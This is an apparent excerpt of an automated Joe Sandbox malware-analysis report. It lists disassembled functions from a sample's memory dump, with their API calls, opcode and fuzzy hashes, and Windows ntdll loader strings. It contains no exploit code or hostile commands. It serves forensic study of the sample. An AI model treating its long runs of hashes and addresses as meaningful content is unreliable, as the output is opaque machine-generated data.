                                                        • Instruction Fuzzy Hash: 3FE0AB21C0D348B3CB10D5B828010DABF78DD42034F2042EFDC8853503E9354C08C39B
                                                        Function 0042B5F3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 283 42b5f3-42b634 call 404623 call 42c373 RtlAllocateHeap
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(?,0041DEFB,?,?,00000000,?,0041DEFB,?,?,?), ref: 0042B62F
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_03.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 644e2e3048a2facb707482932b954ae4fdc2bcc182b30525e1394b29ea1e6bfe
                                                        • Instruction ID: b7419f8e15241fdb2dc45714d02c103a18a650d94661edafeaedc40628b74489
                                                        • Opcode Fuzzy Hash: 644e2e3048a2facb707482932b954ae4fdc2bcc182b30525e1394b29ea1e6bfe
                                                        • Instruction Fuzzy Hash: 08E06DB22442057BD614EE59DC45F9F33ACDFC9750F104419F908A7241D674B91086B8
                                                        Function 0042B693 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 297 42b693-42b6cf call 404623 call 42c373 ExitProcess
                                                        APIs
                                                        • ExitProcess.KERNEL32(?,00000000,?,?,B55C2B2C,?,?,B55C2B2C), ref: 0042B6CA
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_03.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitProcess
                                                        • String ID:
                                                        • API String ID: 621844428-0
                                                        • Opcode ID: 5343b9f8f632d621954db0f0524df6c1fc54869e9834fe10e41d64f24701e42f
                                                        • Instruction ID: 2e4e3db862fd9307ef7dff80f7ac45a99ab4bb3b0bef40cee686630c107f3083
                                                        • Opcode Fuzzy Hash: 5343b9f8f632d621954db0f0524df6c1fc54869e9834fe10e41d64f24701e42f
                                                        • Instruction Fuzzy Hash: E2E04F722406147BC120EA5ADC41F9B776CDBC6714F00441AFA0C67242DA75790186A8
                                                        Function 00417752 Relevance: 1.5, APIs: 1, Instructions: 25libraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 288 417752-41777c 289 417719-417727 LdrLoadDll 288->289 290 41777e-41777f 288->290 291 41772a-41772d 289->291
                                                        APIs
                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417725
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_03.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Load
                                                        • String ID:
                                                        • API String ID: 2234796835-0
                                                        • Opcode ID: f406b443c95aa8b8bc202753eed502b71b197e91b863d455a3e8fec03a0b445f
                                                        • Instruction ID: 7cfd273c7db262a752a0acd52626299a7fd8ecfcdf1c810629e5b5eac046db77
                                                        • Opcode Fuzzy Hash: f406b443c95aa8b8bc202753eed502b71b197e91b863d455a3e8fec03a0b445f
                                                        • Instruction Fuzzy Hash: 1CE0D8762A40045FCB10DAD8DC92FA9B3B4D705711F444284E51AC7340E970AADAD752
                                                        Function 01932C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 61e07885212676b61629307a5e895328050f02690bd9eb7399d965841a00e819
                                                        • Instruction ID: 9564c7fcdbf566727ef33a3d1ddd2c027ceed522f55d40080c6abe50cbd541ef
                                                        • Opcode Fuzzy Hash: 61e07885212676b61629307a5e895328050f02690bd9eb7399d965841a00e819
                                                        • Instruction Fuzzy Hash: 12B09B71D015C5C6DA11F7A4460CB17794477D0701F15C061D2070641F4778D1D1E275

                                                        Non-executed Functions

                                                        Function 01972349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-2160512332
                                                        • Opcode ID: 925e052c30aa9299f2cd334d9823e4a769159216fd32a781a1727a41ed8671cd
                                                        • Instruction ID: c5ab83d0b53b70ef504f9d613bc0811feb04974674d735aeb85146cacd4a2e79
                                                        • Opcode Fuzzy Hash: 925e052c30aa9299f2cd334d9823e4a769159216fd32a781a1727a41ed8671cd
                                                        • Instruction Fuzzy Hash: 0F927A71618342AFE725DF28C880F6AB7E8BF84754F04492DFA98D7291D770E944CB92
                                                        Function 01928620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • undeleted critical section in freed memory, xrefs: 0196542B
                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0196540A, 01965496, 01965519
                                                        • Invalid debug info address of this critical section, xrefs: 019654B6
                                                        • double initialized or corrupted critical section, xrefs: 01965508
                                                        • Critical section address, xrefs: 01965425, 019654BC, 01965534
                                                        • Thread identifier, xrefs: 0196553A
                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 01965543
                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019654E2
                                                        • 8, xrefs: 019652E3
                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019654CE
                                                        • Address of the debug info found in the active list., xrefs: 019654AE, 019654FA
                                                        • corrupted critical section, xrefs: 019654C2
                                                        • Critical section address., xrefs: 01965502
                                                        • Critical section debug info address, xrefs: 0196541F, 0196552E
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                        • API String ID: 0-2368682639
                                                        • Opcode ID: 100277664668d76f141b4a108f67b3e20e635ee930eb00221eca1f584833bc59
                                                        • Instruction ID: c47c20745e393df5726d8b4ac5ee6493cd8364d12c5b5fdc3247e85f35fa9209
                                                        • Opcode Fuzzy Hash: 100277664668d76f141b4a108f67b3e20e635ee930eb00221eca1f584833bc59
                                                        • Instruction Fuzzy Hash: F8818C70A40358EFEB20CF99C885FAEBBF9AB49B14F114159E508F7240D775AA41CB60
                                                        Function 019229F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01962498
                                                        • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01962412
                                                        • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01962624
                                                        • @, xrefs: 0196259B
                                                        • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01962602
                                                        • RtlpResolveAssemblyStorageMapEntry, xrefs: 0196261F
                                                        • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 019624C0
                                                        • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01962409
                                                        • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 019622E4
                                                        • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01962506
                                                        • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 019625EB
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                        • API String ID: 0-4009184096
                                                        • Opcode ID: 9a954894d89460b4de269cced452f0e1acf3a9c77f8b1401628a5e7e60ee0195
                                                        • Instruction ID: e008330eb7ae3dc6b9852b799f51f3ad422d32c77e1eae6ca9eff58406299498
                                                        • Opcode Fuzzy Hash: 9a954894d89460b4de269cced452f0e1acf3a9c77f8b1401628a5e7e60ee0195
                                                        • Instruction Fuzzy Hash: 63024EB1D042299BDB21DB54CC80BAAB7BCAF55704F4045EAE60DA7241EB309F84CF69
                                                        Function 01998B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                        • API String ID: 0-2515994595
                                                        • Opcode ID: f1155fc2229b5081f20bb38231a252f4e2f589847b42c91db5d9eb9bd2e38950
                                                        • Instruction ID: ba30458d73454424293a703b8a51e73eeac060dce5721962b18d7ddc735f9a64
                                                        • Opcode Fuzzy Hash: f1155fc2229b5081f20bb38231a252f4e2f589847b42c91db5d9eb9bd2e38950
                                                        • Instruction Fuzzy Hash: DB51CE715083499BDB29CF1C8844BABBBECEF96744F14491DAA9DC3240E770D648CB92
                                                        Function 019A0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                        • API String ID: 0-1700792311
                                                        • Opcode ID: 4eb87ec4f01870d2cd573177bf95c822fb06c6de60b92d767194a70c760634d6
                                                        • Instruction ID: 8c354083fe20c29c333ab24d4582dde6c8053ab71d35bdbd8a7a55ae30ac5e9e
                                                        • Opcode Fuzzy Hash: 4eb87ec4f01870d2cd573177bf95c822fb06c6de60b92d767194a70c760634d6
                                                        • Instruction Fuzzy Hash: CAD10231600686DFDB22DF68C444AADBBF5FF4A704F4C8049F8899B252D735EA49CB91
                                                        Function 019789B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • AVRF: -*- final list of providers -*- , xrefs: 01978B8F
                                                        • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01978A67
                                                        • VerifierDebug, xrefs: 01978CA5
                                                        • VerifierDlls, xrefs: 01978CBD
                                                        • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01978A3D
                                                        • HandleTraces, xrefs: 01978C8F
                                                        • VerifierFlags, xrefs: 01978C50
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                        • API String ID: 0-3223716464
                                                        • Opcode ID: 6fbd7b65edd77c5fe5cb8bc3a359132c305cf5ad442a653e3a3d1695c5802e26
                                                        • Instruction ID: ef90d1f6d32667b5747c4cca354be9ecb144aba1cd37d20562144dbe2a64b9ac
                                                        • Opcode Fuzzy Hash: 6fbd7b65edd77c5fe5cb8bc3a359132c305cf5ad442a653e3a3d1695c5802e26
                                                        • Instruction Fuzzy Hash: 5191F371A45316AFE722EF68C888B2A77E8AF94724F050858FA4DAF341D7709D04C795
                                                        Function 018FEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                        • API String ID: 0-1109411897
                                                        • Opcode ID: e78fc1acbe6b007a78439b3fbd77f60ed5fc4c7eeefc64240b55e960829b1669
                                                        • Instruction ID: 62d7280c41c0dd4e26127c56ab60e59c61bc7442d44a06b6726087291f9f3847
                                                        • Opcode Fuzzy Hash: e78fc1acbe6b007a78439b3fbd77f60ed5fc4c7eeefc64240b55e960829b1669
                                                        • Instruction Fuzzy Hash: 33A23975A0562A8FDBA5DF18CD887A9BBB5AF45704F1442E9DA0DE7250EB309EC1CF00
                                                        Function 019263FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-792281065
                                                        • Opcode ID: d9f9b32a3c81bfc26c34883c7072dc5c15b0ec3851797c1e5c911e2e64f050dc
                                                        • Instruction ID: 1fa7ddd5484850c873155fceef47144f96e8ec83f8f8a2f881423cf60688587e
                                                        • Opcode Fuzzy Hash: d9f9b32a3c81bfc26c34883c7072dc5c15b0ec3851797c1e5c911e2e64f050dc
                                                        • Instruction Fuzzy Hash: 23916A70B04325DBEB36DF98D844FAA7BE9BF91B24F11012CE90CAB685D7749841C7A1
                                                        Function 018E645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • apphelp.dll, xrefs: 018E6496
                                                        • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 019499ED
                                                        • LdrpInitShimEngine, xrefs: 019499F4, 01949A07, 01949A30
                                                        • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01949A2A
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01949A11, 01949A3A
                                                        • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01949A01
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-204845295
                                                        • Opcode ID: 2d60769fd9ae5faa26fc8b1978d7a8be8b4e6bfa7f23712025884044e2808ede
                                                        • Instruction ID: 388536c645fdae8f3753dbc0ae4d485475065ee12040508a02233dd767d7f8b9
                                                        • Opcode Fuzzy Hash: 2d60769fd9ae5faa26fc8b1978d7a8be8b4e6bfa7f23712025884044e2808ede
                                                        • Instruction Fuzzy Hash: 7651CF712483059FE721DF24C885FAB77E9FB98748F10091DF5999B290E630EA04CB93
                                                        Function 0192C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • LdrpInitializeProcess, xrefs: 0192C6C4
                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01968181, 019681F5
                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 019681E5
                                                        • Loading import redirection DLL: '%wZ', xrefs: 01968170
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0192C6C3
                                                        • LdrpInitializeImportRedirection, xrefs: 01968177, 019681EB
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                        • API String ID: 0-475462383
                                                        • Opcode ID: 8e2260c50fbd931ba2b36674e480092e27a4f4cdc8aaee20b6a6d5e34070718f
                                                        • Instruction ID: 7af53fe2e1e0d4c0984a88510c29273a4d13d871ee8f3a1894894b81c00b6ed5
                                                        • Opcode Fuzzy Hash: 8e2260c50fbd931ba2b36674e480092e27a4f4cdc8aaee20b6a6d5e34070718f
                                                        • Instruction Fuzzy Hash: 5631F3B16443179BC224EF28DD86E1A77E8FFD5B10F050558F989AB395E620ED04C7A2
                                                        Function 01922674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01962180
                                                        • SXS: %s() passed the empty activation context, xrefs: 01962165
                                                        • RtlGetAssemblyStorageRoot, xrefs: 01962160, 0196219A, 019621BA
                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 019621BF
                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01962178
                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0196219F
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                        • API String ID: 0-861424205
                                                        • Opcode ID: 6848f8b82259ece4b11e175425cd593b4d982ddb43269d83ebdd73e0b117f8c9
                                                        • Instruction ID: f35cbddbfcbcd74c8cfc45bbdb48cb82f9762214f1b029ec225b22e079e33e5d
                                                        • Opcode Fuzzy Hash: 6848f8b82259ece4b11e175425cd593b4d982ddb43269d83ebdd73e0b117f8c9
                                                        • Instruction Fuzzy Hash: 5D31E636F44225BBE7218B998C81F5A7B6CEFA4B55F060059FA0CBB244D274AB00C7A1
                                                        Function 0193096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 01932DF0: LdrInitializeThunk.NTDLL ref: 01932DFA
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01930BA3
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01930BB6
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01930D60
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01930D74
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                        • String ID:
                                                        • API String ID: 1404860816-0
                                                        • Opcode ID: 24bb4d32f4fc8e421c64888a796bcb5e1391b43486e8ecbc973b970cbbfc3716
                                                        • Instruction ID: dd0d92087e60e23364c0ada0a213c55c0f763aa0c394650ebec8a8b0b9b5ac15
                                                        • Opcode Fuzzy Hash: 24bb4d32f4fc8e421c64888a796bcb5e1391b43486e8ecbc973b970cbbfc3716
                                                        • Instruction Fuzzy Hash: E4424A75A00715DFDB21CF28C880BAAB7F9FF84314F1445AAE98D9B241D770AA85CF61
                                                        Function 018FA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                        • API String ID: 0-379654539
                                                        • Opcode ID: 112e9ffd1d3f84dbe682032b762222ae05ffa616098e7428ddd0f06018005fc4
                                                        • Instruction ID: 106f33f48978c359532192d5396bd9c1f0bf7909eb996c189be1e60ea728d6db
                                                        • Opcode Fuzzy Hash: 112e9ffd1d3f84dbe682032b762222ae05ffa616098e7428ddd0f06018005fc4
                                                        • Instruction Fuzzy Hash: 09C1AD74508386CFD719CF58C084B6AB7E4BF98728F04486EFA99DB251E734CA49CB52
                                                        Function 01928402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • LdrpInitializeProcess, xrefs: 01928422
                                                        • @, xrefs: 01928591
                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0192855E
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01928421
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-1918872054
                                                        • Opcode ID: 1cc52a8ae6b8459fcb97cd8d6234917d6713da1475e6eaddbc3de6b2a25d7565
                                                        • Instruction ID: bf2874e0f077f52d3072c1d563f1768854d64e775fb80eded731fa36c3d152ed
                                                        • Opcode Fuzzy Hash: 1cc52a8ae6b8459fcb97cd8d6234917d6713da1475e6eaddbc3de6b2a25d7565
                                                        • Instruction Fuzzy Hash: 36919D71508355AFE721DF65CC80EABBAECBF84784F40092EFA88D6155E734DA44CB62
                                                        Function 0192273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 019621D9, 019622B1
                                                        • SXS: %s() passed the empty activation context, xrefs: 019621DE
                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 019622B6
                                                        • .Local, xrefs: 019228D8
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                        • API String ID: 0-1239276146
                                                        • Opcode ID: c8d40aeabbd127720eff09847a267db7c595cba0a16c987bf488236a5e127820
                                                        • Instruction ID: ccfba4680bb50167e412151521b69afcc3f0b45044668292368352dbaa7852e9
                                                        • Opcode Fuzzy Hash: c8d40aeabbd127720eff09847a267db7c595cba0a16c987bf488236a5e127820
                                                        • Instruction Fuzzy Hash: DEA1C135E0022ADFDB25CF58D884BA9B3B8BF58314F1545EAD90CAB255D7309E80CF90
                                                        Function 01924AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0196342A
                                                        • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01963456
                                                        • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01963437
                                                        • RtlDeactivateActivationContext, xrefs: 01963425, 01963432, 01963451
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                        • API String ID: 0-1245972979
